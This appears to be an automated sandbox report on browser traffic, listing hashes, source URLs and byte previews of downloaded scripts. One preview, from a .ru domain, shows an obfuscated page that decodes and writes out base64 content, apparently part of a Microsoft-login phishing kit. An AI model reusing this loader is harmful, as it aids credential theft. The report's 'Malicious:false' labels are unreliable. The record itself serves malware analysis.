                                                      Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                      Category:downloaded
                                                      Size (bytes):116343
                                                      Entropy (8bit):7.997640489040715
                                                      Encrypted:true
                                                      SSDEEP:3072:s8ovOS/D3L+TGsLMet6+iNLTMMqfC4hyFv0As5:jNSrij/t6+aAMqfCoydM5
                                                      MD5:3063B0DA40B45B46602FCE99AC53D315
                                                      SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                      SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                      SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_27cef08ca792f8e8b149.js
                                                      Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65447)
                                                      Category:dropped
                                                      Size (bytes):89501
                                                      Entropy (8bit):5.289893677458563
                                                      Encrypted:false
                                                      SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text, with very long lines (7501), with CRLF line terminators
                                                      Category:downloaded
                                                      Size (bytes):20251
                                                      Entropy (8bit):5.890404035561497
                                                      Encrypted:false
                                                      SSDEEP:384:/1ynu6azRZTjDVvVHznu6azRZTjDVvV6lroXlr2:dvVZpdmVZpd6lroXlr2
                                                      MD5:9168770612AA0FEB4B61274E990C4FE3
                                                      SHA1:C9F3325D839FEEFB3EE1EC4515D9F47CD5FDF4A3
                                                      SHA-256:1411D8F3ED438941375970A078040F678DE7319695CBB37D088E908C78A02950
                                                      SHA-512:120DA6B200AA1B89CE824B2264A5B400A5A192A955E9D8E76461005F30BF0B1F2F9E86E93E2E30EBAEE487C4AB23B25E73D256956C98BCD90ABD5E9371FF9306
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://2ol.itectaxice.ru/Qm75/
                                                      Preview: Success usually comes to those who are too busy to be looking for it. -->.. Don&#039;t be distracted by criticism. Remember, the only taste of success some people get is to take a bite out of you. -->..<script>../* Success is the sum of small efforts, repeated day in and day out. */..if(atob("aHR0cHM6Ly9jTC5pdGVjdGF4aWNlLnJ1L1FtNzUv") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDx
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                      Category:dropped
                                                      Size (bytes):49911
                                                      Entropy (8bit):7.994516776763163
                                                      Encrypted:true
                                                      SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                      MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                      SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                      SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                      SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                      Category:downloaded
                                                      Size (bytes):3452
                                                      Entropy (8bit):5.117912766689607
                                                      Encrypted:false
                                                      SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                      MD5:CB06E9A552B197D5C0EA600B431A3407
                                                      SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                      SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                      SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://login.live.com/Me.htm?v=3
                                                      Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):72
                                                      Entropy (8bit):4.241202481433726
                                                      Encrypted:false
                                                      SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                      MD5:9E576E34B18E986347909C29AE6A82C6
                                                      SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                      SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                      SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                      Category:downloaded
                                                      Size (bytes):122515
                                                      Entropy (8bit):7.997419459076181
                                                      Encrypted:true
                                                      SSDEEP:3072:1L4xVJNv/cJPu5OEjvuUQIq40zDH227PURbj:1kbGugELatzL7PUlj
                                                      MD5:AC9A6ED508328361A4C9530325A94076
                                                      SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                      SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                      SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_kAx9qZOSH4g90FNHstHMCA2.js
                                                      Preview:...........}[.8......\&.L..{.x.t.nv.p......ql%xH...rB....J.-'..=...}...&.Jo.R..T*}.y..*.\....J....uipR..|zuT....(]..O..._.6.......?e%.;rb...F%?p.h.FN......|gZ.G.<..<..dn...~.@.....2T.y.K'J^K...*..6...P.....!).a.....6.. f.E......s..8.'......F.....KN.J1KJ.0J.x?..!B.Zcj....8t.....1......!vq..Ac.0..V.N..a..}(%a.5\..g..I..6...L...x.7.......8..B..J....^b/s.....I...r..L.3.... ..y...^K.l.....%.'.|.8.T.....$.R..8.j.?.R.f..}..o.....$....a.'..Q..g..p1.:1t.}..y..}8...3...8....b.=(..3..d[.*.Os......%....Z...G.......x...2.,..RP..+..O. _....n.;=.?.....w../au.I.p...U|;......WM.f?...9.>8..9.....S../;._..un...].:_..e..V*:.....@..[.*.Ue.'Pe..&wv..T..ow.........?..\)WVb..r.;.....A........mpW.X.........B.....I...}j.....(...1.e.D.~.....;F..:..P.=.....(r^........N1.F....@..W%y.....t...Q....Y.5.$.O..x@.l.4.a.b*.f..3.2.B...DL}4Y.:.u........`?....W`Z".S.S..}= .:......i.@E"1T.....`\.a....J:].....R....=R..y...*......s<;....~NXr<%...|.v&...5..*....D.(9...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 32 x 47, 8-bit/color RGB, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):61
                                                      Entropy (8bit):3.9778349503715043
                                                      Encrypted:false
                                                      SSDEEP:3:yionv//thPl3A46pikxl/k4E08up:6v/lhP76gk7Tp
                                                      MD5:5E01459821809B3E9F652B4416DB34CB
                                                      SHA1:E2AD8D24C07611EB01A0B297C2BDD4267045BAF2
                                                      SHA-256:82D92C6293D15B922FE50318CF1D3C0430466D7AF89D2C27401857C316E61667
                                                      SHA-512:757699C1CEF49B886EA649EE99600369D1F6A04D7A937991D7F62BDB5B55A5C621841200230E1016CFBF5CE88992D8C7C778D5242E104ABF59DC9DF6C8C43A83
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/901e8eeb3e1dc337/1736867485190/-jhu53-RLAzm1Ay
                                                      Preview:.PNG........IHDR... .../......N_v....IDAT.....$.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (48316), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):48316
                                                      Entropy (8bit):5.6346993394709
                                                      Encrypted:false
                                                      SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                      MD5:2CA03AD87885AB983541092B87ADB299
                                                      SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                      SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                      SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                      Category:downloaded
                                                      Size (bytes):621
                                                      Entropy (8bit):7.673946009263606
                                                      Encrypted:false
                                                      SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                      MD5:4761405717E938D7E7400BB15715DB1E
                                                      SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                      SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                      SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                      Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                      Category:dropped
                                                      Size (bytes):122515
                                                      Entropy (8bit):7.997419459076181
                                                      Encrypted:true
                                                      SSDEEP:3072:1L4xVJNv/cJPu5OEjvuUQIq40zDH227PURbj:1kbGugELatzL7PUlj
                                                      MD5:AC9A6ED508328361A4C9530325A94076
                                                      SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                      SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                      SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:...........}[.8......\&.L..{.x.t.nv.p......ql%xH...rB....J.-'..=...}...&.Jo.R..T*}.y..*.\....J....uipR..|zuT....(]..O..._.6.......?e%.;rb...F%?p.h.FN......|gZ.G.<..<..dn...~.@.....2T.y.K'J^K...*..6...P.....!).a.....6.. f.E......s..8.'......F.....KN.J1KJ.0J.x?..!B.Zcj....8t.....1......!vq..Ac.0..V.N..a..}(%a.5\..g..I..6...L...x.7.......8..B..J....^b/s.....I...r..L.3.... ..y...^K.l.....%.'.|.8.T.....$.R..8.j.?.R.f..}..o.....$....a.'..Q..g..p1.:1t.}..y..}8...3...8....b.=(..3..d[.*.Os......%....Z...G.......x...2.,..RP..+..O. _....n.;=.?.....w../au.I.p...U|;......WM.f?...9.>8..9.....S../;._..un...].:_..e..V*:.....@..[.*.Ue.'Pe..&wv..T..ow.........?..\)WVb..r.;.....A........mpW.X.........B.....I...}j.....(...1.e.D.~.....;F..:..P.=.....(r^........N1.F....@..W%y.....t...Q....Y.5.$.O..x@.l.4.a.b*.f..3.2.B...DL}4Y.:.u........`?....W`Z".S.S..}= .:......i.@E"1T.....`\.a....J:].....R....=R..y...*......s<;....~NXr<%...|.v&...5..*....D.(9...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (47520)
                                                      Category:dropped
                                                      Size (bytes):47521
                                                      Entropy (8bit):5.3981340461317835
                                                      Encrypted:false
                                                      SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                      MD5:7C92EC9D1395055CE0405A32607C7291
                                                      SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                      SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                      SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                      Category:downloaded
                                                      Size (bytes):49911
                                                      Entropy (8bit):7.994516776763163
                                                      Encrypted:true
                                                      SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                      MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                      SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                      SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                      SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                      Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):61
                                                      Entropy (8bit):3.990210155325004
                                                      Encrypted:false
                                                      SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                      Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                      Category:downloaded
                                                      Size (bytes):5525
                                                      Entropy (8bit):7.961202222662501
                                                      Encrypted:false
                                                      SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                      MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                      SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                      SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                      SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_1cd84c14a6b01fcd8515.js
